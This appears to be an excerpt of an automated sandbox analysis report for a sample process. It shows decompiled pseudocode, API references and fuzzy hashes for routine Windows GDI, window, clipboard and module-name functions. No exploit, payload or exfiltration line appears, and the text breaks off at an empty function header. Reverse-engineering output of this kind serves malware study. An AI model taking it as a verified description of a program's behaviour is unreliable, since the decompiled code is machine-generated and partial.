0x0042153f
0x00421545
0x00421548
0x0042154b
0x0042154e
0x00421557
0x00421562
0x00421570
0x00421576
0x0042157e
0x00421586
0x004215a3
0x004215a8
0x004215ad
0x00421588
0x00421592
0x0042159e
0x0042159e
0x004215b7
0x004215be
0x004215c0
0x004215c0
0x004215c7
0x004215c8
0x004215cd
0x004215d0
0x004215d9
0x004215ef
0x004215f5
0x00421607
0x00421609
0x004215f7
0x004215f7
0x004215f7
0x0042160e
0x00421611
0x00421614
0x00421624

APIs

GetSystemMetrics.USER32 ref: 0042158A
GetSystemMetrics.USER32 ref: 00421596
GetDC.USER32(00000000), ref: 004215B2
GetDeviceCaps.GDI32(00000000,0000000E), ref: 004215D9
GetDeviceCaps.GDI32(00000000,0000000C), ref: 004215E6
ReleaseDC.USER32 ref: 0042161F

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: 041cace95e2c95455e02fd26e001397014c2dce48cd77e576c719cc50a5130e2
Instruction ID: 1e02ddd1ec2005f7b5f9bbc42ad3a6e0c9d41db1ceb18bddea3d27d6e7565a01
Opcode Fuzzy Hash: 041cace95e2c95455e02fd26e001397014c2dce48cd77e576c719cc50a5130e2
Instruction Fuzzy Hash: 7B317374A00214EFDB00DFA5D841AAEBBF5FF88714F54856AF815AB390C734AD40CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004219AC, Relevance: 9.1, APIs: 6, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004219AC(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HPALETTE__* _v12;
				struct HDC__* _v16;
				struct tagBITMAPINFO* _t36;
				intOrPtr _t43;
				struct HBITMAP__* _t47;
				void* _t50;

				_t36 = __ecx;
				_t47 = __eax;
				E0042185C(__eax, _a4, __ecx);
				_v12 = 0;
				_v16 = CreateCompatibleDC(0);
				_push(_t50);
				_push(0x421a49);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if(__edx != 0) {
					_v12 = SelectPalette(_v16, __edx, 0);
					RealizePalette(_v16);
				}
				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(E00421A50);
				if(_v12 != 0) {
					SelectPalette(_v16, _v12, 0);
				}
				return DeleteDC(_v16);
			}

0x004219b5
0x004219b9
0x004219c2
0x004219c9
0x004219d3
0x004219d8
0x004219d9
0x004219de
0x004219e1
0x004219e6
0x004219f4
0x004219fb
0x004219fb
0x00421a19
0x00421a1f
0x00421a22
0x00421a25
0x00421a2e
0x00421a3a
0x00421a3a
0x00421a48

APIs

Part of subcall function 0042185C: GetObjectA.GDI32(?,00000054), ref: 00421870

CreateCompatibleDC.GDI32(00000000), ref: 004219CE
SelectPalette.GDI32(?,?,00000000), ref: 004219EF
RealizePalette.GDI32(?), ref: 004219FB
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00421A12
SelectPalette.GDI32(?,00000000,00000000), ref: 00421A3A
DeleteDC.GDI32(?), ref: 00421A43

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
String ID:
API String ID: 1221726059-0
Opcode ID: 147e4cd242d4be9d281feb98c01640ca496c1b9021977b46c758e211fca80921
Instruction ID: 39db5832c03bedfee2225aaf3531bb04be9924a5546b3e83a7a5408937e5b18e
Opcode Fuzzy Hash: 147e4cd242d4be9d281feb98c01640ca496c1b9021977b46c758e211fca80921
Instruction Fuzzy Hash: CB118F75B04214BFDB10DBA9CC82F5EB7FCEB48700F51846AB518E7290D678A910CB28

Uniqueness

Uniqueness Score: -1.00%

Function 004329A0, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004329A0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x476900; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x476900; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x476900; // 0x0
				SetPropA(_a4,  *0x492b7a & 0x0000ffff, _t27);
				_t31 =  *0x476900; // 0x0
				SetPropA(_a4,  *0x492b78 & 0x0000ffff, _t31);
				_t35 =  *0x476900; // 0x0
				 *0x476900 = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}

0x004329a5
0x004329a8
0x004329b0
0x004329b6
0x004329c8
0x004329dd
0x004329f8
0x004329f8
0x004329fd
0x00432a0f
0x00432a14
0x00432a26
0x00432a37
0x00432a3c
0x00432a4c
0x00432a54

APIs

SetWindowLongA.USER32 ref: 004329C8
GetWindowLongA.USER32 ref: 004329D3
GetWindowLongA.USER32 ref: 004329E5
SetWindowLongA.USER32 ref: 004329F8
SetPropA.USER32(?,00000000,00000000), ref: 00432A0F
SetPropA.USER32(?,00000000,00000000), ref: 00432A26

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: 0716af0086cb08c84303f443826fada7a17ddc4a539cc45d37b1b88b3d6d2ae0
Instruction ID: abb13c6c5d5e2e5b8342f50275d9cd4f433c03c6d39adc140e830f34be4605c3
Opcode Fuzzy Hash: 0716af0086cb08c84303f443826fada7a17ddc4a539cc45d37b1b88b3d6d2ae0
Instruction Fuzzy Hash: BC111CB6504209BFCB40DF99DC84E9A3BECBB09354F108625FA18DB2A1D735E940DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004211EC, Relevance: 9.1, APIs: 6, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004211EC(void* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				void* _t20;
				struct HDC__* _t25;
				void* _t28;
				void* _t31;
				struct HPALETTE__* _t33;
				LOGPALETTE* _t34;

				_t31 = __eax;
				_t33 = 0;
				_t34->palVersion = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E004029BC(_t28, __ecx << 2,  &_v1036);
				} else {
					_t25 = CreateCompatibleDC(0);
					_t20 = SelectObject(_t25, _t31);
					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
					SelectObject(_t25, _t20);
					DeleteDC(_t25);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E00421154(_t34) == 0) {
						E00420FE4( &_v1036, _v1038 & 0x0000ffff);
					}
					_t33 = CreatePalette(_t34);
				}
				return _t33;
			}

0x004211f5
0x004211f7
0x004211f9
0x00421201
0x0042123b
0x00421249
0x00421203
0x0042120a
0x0042120e
0x00421227
0x0042122e
0x00421234
0x00421234
0x00421254
0x0042125c
0x00421272
0x00421272
0x0042127f
0x0042127f
0x0042128c

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00421205
SelectObject.GDI32(00000000,00000000), ref: 0042120E
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424C53,?,?,?,?,0042375F), ref: 00421222
SelectObject.GDI32(00000000,00000000), ref: 0042122E
DeleteDC.GDI32(00000000), ref: 00421234
CreatePalette.GDI32 ref: 0042127A

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
String ID:
API String ID: 2515223848-0
Opcode ID: b757113e1914b80df245d1b0cc6a716640e6c2ddefab822ddf1dfef8ab53b59c
Instruction ID: 0aa895c431452f674cf9a11a22d758fd895376930466322e03491361ff35dc2e
Opcode Fuzzy Hash: b757113e1914b80df245d1b0cc6a716640e6c2ddefab822ddf1dfef8ab53b59c
Instruction Fuzzy Hash: 9C01966130432066E624B76A9D47E6B76F89FC0758F01C82FB585F72D2E67D8844C36A

Uniqueness

Uniqueness Score: -1.00%

Function 0045AE18, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045AE18(void* __eax) {
				struct tagRECT _v20;
				struct HWND__* _t18;
				void* _t29;
				RECT* _t30;

				_t29 = __eax;
				ValidateRect(E0043C1F4(__eax), 0);
				InvalidateRect(E0043C1F4(_t29), 0, 0xffffffff);
				GetClientRect(E0043C1F4(_t29), _t30);
				_t18 = E0043C1F4( *((intOrPtr*)(_t29 + 0x240)));
				MapWindowPoints(E0043C1F4(_t29), _t18,  &_v20, 2);
				ValidateRect(E0043C1F4( *((intOrPtr*)(_t29 + 0x240))), _t30);
				return InvalidateRect(E0043C1F4( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
			}

0x0045ae1c
0x0045ae28
0x0045ae39
0x0045ae47
0x0045ae59
0x0045ae67
0x0045ae79
0x0045ae9a

APIs

ValidateRect.USER32(00000000,00000000,0045B66C), ref: 0045AE28
InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045B66C), ref: 0045AE39
GetClientRect.USER32 ref: 0045AE47
MapWindowPoints.USER32 ref: 0045AE67
ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045B66C), ref: 0045AE79
InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045AE91

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$InvalidateValidate$ClientPointsWindow
String ID:
API String ID: 2846033224-0
Opcode ID: c1419930f4ef1b886e20b1edb55900f5659d58c3b8b529466c9ad2514b523a82
Instruction ID: 8f7b6e4afddd45d0abec9c93a9cd33b7b645bb2b6bb9daf2783f45f17faafeb9
Opcode Fuzzy Hash: c1419930f4ef1b886e20b1edb55900f5659d58c3b8b529466c9ad2514b523a82
Instruction Fuzzy Hash: 20F09190A1830166DA00B6798CC7F4B229C5B0871CF001B7EB529FB1C3DD3CE8446B69

Uniqueness

Uniqueness Score: -1.00%

Function 004208D0, Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004208D0(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041FC20( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041FC20( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041FD00( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041EF40(E0041FBE4( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041EF40(E0041FBE4( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x004208d1
0x004208dc
0x004208ee
0x004208fd
0x00420937
0x00420948
0x004208ff
0x00420911
0x00420922
0x00420922

APIs

Part of subcall function 0041FC20: CreateBrushIndirect.GDI32(?), ref: 0041FCCA

UnrealizeObject.GDI32(00000000), ref: 004208DC
SelectObject.GDI32(?,00000000), ref: 004208EE
SetBkColor.GDI32(?,00000000), ref: 00420911
SetBkMode.GDI32(?,00000002), ref: 0042091C
SetBkColor.GDI32(?,00000000), ref: 00420937
SetBkMode.GDI32(?,00000001), ref: 00420942

Part of subcall function 0041EF40: GetSysColor.USER32(?), ref: 0041EF4A

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: a6638d6117bb529ea926627c6f0db795f0041ecf8f71370c7e66df592e636c83
Instruction ID: 55d553c2621eb92ca65e360b7563c21cbe5e5e16202b80e0da2f938bdbfb08af
Opcode Fuzzy Hash: a6638d6117bb529ea926627c6f0db795f0041ecf8f71370c7e66df592e636c83
Instruction Fuzzy Hash: A6F0CDB5604100ABDB04FFBADAC6E4B77A8AF0430970444AABD49DF197C93DE8518739

Uniqueness

Uniqueness Score: -1.00%

Function 00409F1C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409F1C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;

				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L2:
					_t40 =  *0x492714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409F10(_t73);
					L4:
					E00408C38( &_v273, 0x104, E0040ACC4(0x5c, _t89) + 1);
					_t74 = 0x40a09c;
					_t86 = 0x40a09c;
					_t83 =  *0x4077b0; // 0x4077fc
					if(E00403768(_t87, _t83) != 0) {
						_t74 = E004047F8( *((intOrPtr*)(_t87 + 4)));
						_t69 = E00408BD4(_t74, 0x40a09c);
						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
							_t86 = 0x40a0a0;
						}
					}
					_t51 =  *0x491268; // 0x407570
					_t16 = _t51 + 4; // 0xffe7
					_t53 =  *0x492714; // 0x400000
					LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
					E0040352C( *_t87,  &_v1116);
					_v860 =  &_v1116;
					_v856 = 4;
					_v852 =  &_v273;
					_v848 = 6;
					_v844 = _v12;
					_v840 = 5;
					_v836 = _t74;
					_v832 = 6;
					_v828 = _t86;
					_v824 = 6;
					E00409308(_v8,  &_v790, _a4, 4,  &_v860);
					return E00408BD4(_v8, _t86);
				}
				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
				_t89 = _t72;
				if(_t72 != 0) {
					_t75 = _t73 - _v820.AllocationBase;
					__eflags = _t75;
					_v12 = _t75;
					goto L4;
				}
				goto L2;
			}

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F39
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F5D
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F78
LoadStringA.USER32 ref: 0040A00E

Strings

pu@, xrefs: 00409FFA

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: pu@
API String ID: 3990497365-2401533281
Opcode ID: a5a38b676bc936d8dd8f9445abed1e69830851b5971d238807bc6027ad4bc452
Instruction ID: 250c0a161400bf9fd184712dd392f999e4706025d89d5f7226f90af7568db904
Opcode Fuzzy Hash: a5a38b676bc936d8dd8f9445abed1e69830851b5971d238807bc6027ad4bc452
Instruction Fuzzy Hash: 86411D70A002589BDB21DB69CD85BDAB7BC9B08304F0440FAA548F7292D7789F848F59

Uniqueness

Uniqueness Score: -1.00%

Function 00409F1A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409F1A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L3:
					_t40 =  *0x492714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409F10(_t74);
				} else {
					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
					_t101 = _t72;
					if(_t72 != 0) {
						_t77 = _t74 - _v820.AllocationBase;
						__eflags = _t77;
						_v12 = _t77;
					} else {
						goto L3;
					}
				}
				E00408C38( &_v273, 0x104, E0040ACC4(0x5c, _t101) + 1);
				_t75 = 0x40a09c;
				_t89 = 0x40a09c;
				_t85 =  *0x4077b0; // 0x4077fc
				if(E00403768(_t92, _t85) != 0) {
					_t75 = E004047F8( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00408BD4(_t75, 0x40a09c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a0a0;
					}
				}
				_t51 =  *0x491268; // 0x407570
				_t16 = _t51 + 4; // 0xffe7
				_t53 =  *0x492714; // 0x400000
				LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
				E0040352C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00409308(_v8,  &_v790, _a4, 4,  &_v860);
				return E00408BD4(_v8, _t89);
			}

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F39
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F5D
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F78
LoadStringA.USER32 ref: 0040A00E

Strings

pu@, xrefs: 00409FFA

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: pu@
API String ID: 3990497365-2401533281
Opcode ID: 2fd7aeb24a657c887c83b712f53809e3310aaf4af242ca15c34684c4680f70f1
Instruction ID: b7b1d11f73f2457e4bc21a9f9f0e3170b821447ab0156cd7e66acd5e017d983c
Opcode Fuzzy Hash: 2fd7aeb24a657c887c83b712f53809e3310aaf4af242ca15c34684c4680f70f1
Instruction Fuzzy Hash: C9412D70A002589BDB21DB69CD85BDAB7FC9B08304F0440FAB548F7292D7789F848F59

Uniqueness

Uniqueness Score: -1.00%

Function 0042F4FC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042F4FC(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				void* __ecx;
				void* __ebp;
				void* _t16;
				void* _t20;
				void* _t24;
				void* _t25;
				signed short _t26;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t38;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t48;
				intOrPtr _t51;

				_t43 = __edx;
				_v8 = __eax;
				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
				_push(_t51);
				_push(0x42f59e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t51;
				_t26 = EnumClipboardFormats(0);
				_t52 = _t26;
				if(_t26 == 0) {
					L4:
					_t29 =  *0x490f50; // 0x41d728
					E0040A214(_t29, 1);
					E00403DA8();
					__eflags = 0;
					_pop(_t38);
					 *[fs:eax] = _t38;
					return  *((intOrPtr*)( *_v8 + 0x14))(0x42f5a5);
				} else {
					while(1) {
						_t16 = E004224A4(_t26, _t52);
						_t53 = _t16;
						if(_t16 != 0) {
							break;
						}
						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
						__eflags = _t26;
						if(__eflags != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					_t20 = GetClipboardData(_t26 & 0x0000ffff);
					E004223B4(_t43, _t20, _t26, _t53, GetClipboardData(9));
					_t24 = E00403E54();
					return _t24;
				}
				L6:
			}

APIs

EnumClipboardFormats.USER32(00000000,00000000,0042F59E), ref: 0042F520
GetClipboardData.USER32 ref: 0042F540
GetClipboardData.USER32 ref: 0042F549
EnumClipboardFormats.USER32(00000000,00000000,00000000,0042F59E), ref: 0042F565

Strings

4A, xrefs: 0042F52E

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$DataEnumFormats
String ID: 4A
API String ID: 1256399260-2184028395
Opcode ID: 12436c1aa4965cc38b4b179ff19ed5e3f7e1a3e194c48466feb82a99d1ed052d
Instruction ID: eae3a1543f8d4298aff6f539ec285c762ca43621e29743c359a572c9318fe245
Opcode Fuzzy Hash: 12436c1aa4965cc38b4b179ff19ed5e3f7e1a3e194c48466feb82a99d1ed052d
Instruction Fuzzy Hash: 4F112370700211BFD600FF66E952A2AB7E9EB85754B90007BF808DB382CD39DC44C668

Uniqueness

Uniqueness Score: -1.00%

Function 004545B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004545B0(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x492c04; // 0x2210d40
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E00454540, _t37);
						_t17 =  *(_t27 + 0x90);
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t17 =  *(_t27 + 0x90);
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t17 = SetWindowPos(E004141BC( *(_t27 + 0x90), _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}

APIs

EnumWindows.USER32(00454540), ref: 004545E5
GetWindow.USER32(00000003,00000003), ref: 004545FD
GetWindowLongA.USER32 ref: 0045460A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00454649

Strings

dZG, xrefs: 004545B0

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnumLongWindows
String ID: dZG
API String ID: 4191631535-410245891
Opcode ID: 8e359ed334a69be4760922c82b058440bf929986694345fc13871243cf8b0c95
Instruction ID: c7c913ac3e620f8f4a439399e163372e1a93407348564ef15a95a51b3fb9fedf
Opcode Fuzzy Hash: 8e359ed334a69be4760922c82b058440bf929986694345fc13871243cf8b0c95
Instruction Fuzzy Hash: 83115170604210AFDB109F28CC85F9673D4AB56729F55017AFD68AF2D3C3789C85C759

Uniqueness

Uniqueness Score: -1.00%

Function 00403454, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

